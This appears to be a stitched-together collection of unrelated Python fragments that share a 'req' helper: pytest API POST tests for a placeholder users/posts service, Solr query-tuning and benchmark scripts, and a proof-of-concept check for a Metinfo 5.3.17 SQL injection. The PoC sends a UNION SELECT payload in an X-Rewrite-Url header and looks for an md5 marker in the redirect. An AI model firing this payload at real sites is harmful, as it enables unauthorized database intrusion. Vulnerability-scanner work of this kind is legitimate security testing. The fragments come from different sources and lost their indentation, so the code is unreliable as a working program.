def test_users_post():
# post запрос на добавление нового юзера.
k = req(gbl.users_url)
le = k.json_lenght() + 1
payload = {
"name": "Glenna Reichert",
"username": "******",
"email": "*****@*****.**",
"address": {
"street": "Dayna Park",
"suite": "Suite 449",
"city": "Bartholomebury",
"zipcode": "76495-3109",
"geo": {
"lat": "24.6463",
"lng": "-168.8889"
}
},
"phone": "(775)976-6794 x41206",
"website": "conrad.com",
"company": {
"name": "Yost and Sons",
"catchPhrase": "Switchable contextually-based project",
"bs": "aggregate real-time technologies"
}
}
q = request(gbl.users_url, gbl.schema_users_post(le), payload)
q.post_simple()
def test_albums_post(param_users):
# post запрос на добавление нового альбома, проверяем при разных userId
k = req(gbl.albums_url)
le = k.json_lenght() + 1
payload = {"title": "post_19:55", "userId": param_users}
q = request(gbl.albums_url, gbl.schema_albums_post(param_users, le),
payload)
q.post_simple()
def test_comments_post(param_posts):
# post запрос на добавление нового поста, проверяем при разных userId
k = req(gbl.comments_url)
le = k.json_lenght()+1
payload = {"name":"comm_19:55","body":"this is simple new post by me",
"postId":param_posts,"email":"*****@*****.**"}
q = request(gbl.comments_url,gbl.schema_comments_post(param_posts,le),
payload)
q.post_simple()
def test_todos_post(param_users):
# post запрос на добавление нового задания, проверяем при разных userId
k = req(gbl.todos_url)
le = k.json_lenght() + 1
payload = {
"title": "post_19:55",
"completed": False,
"userId": param_users
}
q = request(gbl.todos_url, gbl.schema_todos_post(param_users, le), payload)
q.post_simple()
def test_posts_post(param_users):
# post запрос на добавление нового поста, проверяем при разных userId
k = req(gbl.posts_url)
le = k.json_lenght() + 1
payload = {
"title": "post_19:55",
"body": "this is simple new post by me",
"userId": param_users
}
q = request(gbl.posts_url, gbl.schema_posts_post(param_users, le), payload)
q.post_simple()
def test_photos_post(param_albums):
# post запрос на добавление нового фото, проверяем при разных albumId
k = req(gbl.photos_url)
le = k.json_lenght() + 1
payload = {
"title": "post_19:55",
"url": "https://azcxards.net/3/1",
"thumbnailUrl": "https://azcxards.net/3/1",
"albumId": param_albums
}
q = request(gbl.photos_url, gbl.schema_photos_post(param_albums, le),
payload)
q.post_simple()
def run(solr_url, query, haystack,
qf="title,author",
min=0.0, max=2.0, increment=0.25,
max_hits=100):
min = float(min)
max = float(max)
increment = float(increment)
max_hits = int(max_hits)
if (os.path.exists(query)):
queries = load_queries(query)
else:
queries = [query]
if (os.path.exists(haystack)):
haystack = load_queries(haystack)
else:
haystack = [haystack]
haystack = [x.split(':', 1) for x in haystack]
fl = ','.join(list(set([x[0] for x in haystack])))
combinations = generate_combinations(qf, min, max, increment)
results = {'variations': combinations}
i = 0
for qf in combinations:
i = i + 1
log.info("Starting combination: %s %d/%d" % (qf, i, len(combinations)))
for q in queries:
log.info("%s" % q)
rsp = req(solr_url, q=q, qf=qf, fl=fl, rows=max_hits)
collect_data(q, qf, results, rsp, haystack)
def custom_handler(obj):
if isinstance(obj, DataPoint):
return obj.jsonize()
return obj
out = {}
out['results'] = results
out['simplified'] = output_positions(results)
out['params'] = dict(max=max, min=min, increment=increment, solr=solr_url, query=query,
maxhits=max_hits, generated=datetime.date.today().isoformat())
print simplejson.dumps(out, default=custom_handler)
def select_representative_record(rsp, solr_url, j, query_name):
if not rsp['response'].has_key('docs'):
return None
tmp_results = []
for doc in rsp['response']['docs']:
q = "bibcode:%s" % doc['bibcode']
cit_rsp = req(solr_url, q=("%s(%s)" % (query_name, q)), fl="citation_count", rows=0)
if (not cit_rsp['responseHeader'].has_key('status') or cit_rsp['responseHeader']['status'] != 0):
log.error("Error searching: %s" % str(rsp))
continue
numfound = cit_rsp['response']['numFound']
qtime = cit_rsp['responseHeader']['QTime']
tmp_results.append((q, numfound, qtime))
if numfound == j:
break
if len(tmp_results):
return sorted(tmp_results, key=lambda x: abs((x[1] % j)))[0]
def verify(self, first=False):
# 漏洞验证方法(mode=verify)
target = self.scan_info.get("Target", "") # 获取测试目标
verbose = self.scan_info.get("Verbose", False) # 是否打印详细信息
# 以下是PoC的检测逻辑
url = urljoin(target,'index.php?lang=Cn&index=1')
payload = "1/2/zxxza' union select 1,2,3,md5(0x11),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#/index.php"
headers = {
"X-Rewrite-Url": payload
}
location = ""
# 使用req做HTTP请求的发送和响应的处理,req是TCC框架将requests的HTTP请求方法封装成统一的req函数,使用req(url, method, **kwargs),参数传递同requests
resp = req(url, 'get', headers=headers, allow_redirects=False)
if resp is not None:
location = resp.headers.get("Location", "")
if "47ed733b8d10be225eceba344d533586" in location:
self.scan_info['Success'] = True # 漏洞存在,必须将该字段更新为True(必须)
self.scan_info['Ret']['VerifyInfo']['URL'] = url # 记录漏洞相关的一些额外信息(可选)
self.scan_info['Ret']['VerifyInfo']['DATA'] = "X-Rewrite-Url:" + payload
if verbose:
highlight('[*] Metinfo 5.3.17 X-Rewrite-url SQL Injection found') # 打印高亮信息发现漏洞,其他可用方法包括info()/warn()/error()/highlight()方法分别打印不同等级的信息
def run(solr_url,
query_name='citations',
fl="title,author,recid,bibcode",
min=0, max=4000000, increment=9,
max_hits=10, max_qtime=60000
):
results = []
# first start with simple queries
i = 0
j = None
empty = 0
while False:
i = i + 1
j = i + increment
q = "citation_count:[%s TO %s]" % (i,j)
log.info("%s" % q)
rsp = req(solr_url, q=q, fl=fl, rows=max_hits, sort="citation_count desc")
r = select_representative_record(rsp, solr_url, j, query_name)
if r != None:
results.append(r)
empty = 0
else:
empty = empty + 1
if empty > 3:
break
if j >= max:
break
i = j
start_id = max
end_id = start_id
incr = 100
cycle = 1
while True:
end_id = end_id + (cycle * (incr * increment))
q = "id:[%s TO %s]" % (start_id, end_id)
log.info("%s" % q)
# first issue the query without citations
rsp = req(solr_url, q=q, fl=fl, rows=1)
# now execute the functional query
rsp = req(solr_url, q=("%s(%s)" % (query_name, q)), fl=fl, rows=1)
if (not rsp['responseHeader'].has_key('status') or rsp['responseHeader']['status'] != 0):
log.error("Error searching: %s" % str(rsp))
continue
numfound = rsp['response']['numFound']
qtime = rsp['responseHeader']['QTime']
results.append((q, numfound, qtime))
if numfound > max or qtime > max_qtime:
log.info("Stopping because qtime too high: %s" % (qtime,))
break
log.info("last found: q=%s, num=%s, qtime=%s" % (q, numfound, qtime))
cycle += 1
today = datetime.date.today()
previous = today
resolution = 30
stop_day = datetime.date.fromordinal(today.toordinal()-(365*2))
while False:
q = "pubdate:[%s TO %s]" % (str(previous),str(today))
log.info("%s" % q)
# now execute the functional query
rsp = req(solr_url, q=("%s(%s)" % (query_name, q)), fl=fl, rows=1)
if (not rsp['responseHeader'].has_key('status') or rsp['responseHeader']['status'] != 0):
log.error("Error searching: %s" % str(rsp))
continue
numfound = rsp['response']['numFound']
qtime = rsp['responseHeader']['QTime']
results.append((q, numfound, qtime))
previous = previous.fromordinal(previous.toordinal() - resolution)
if previous < stop_day:
break
print "#%s" % (query_name,)
print "query\tnumFound\tQTime"
print "\n".join(map(lambda x: "%s\t%s\t%s" % x, results))
